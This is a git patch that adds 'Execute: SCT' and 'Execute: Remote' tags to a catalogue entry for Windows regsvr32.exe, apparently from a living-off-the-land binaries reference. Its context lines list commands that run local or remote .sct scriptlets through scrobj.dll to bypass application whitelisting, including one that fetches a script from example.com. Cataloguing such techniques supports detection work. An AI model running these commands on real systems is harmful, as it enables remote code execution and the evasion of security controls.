From b452a6c3e3705fcab4103cf2189043644ab93a82 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:48:37 +0200 Subject: [PATCH] Update Regsvr32.yml Tags Added Tags Execute: Remote Execute: SCT --- yml/OSBinaries/Regsvr32.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 27067b8..43dc039 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -18,6 +21,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting @@ -25,6 +30,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -32,6 +40,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe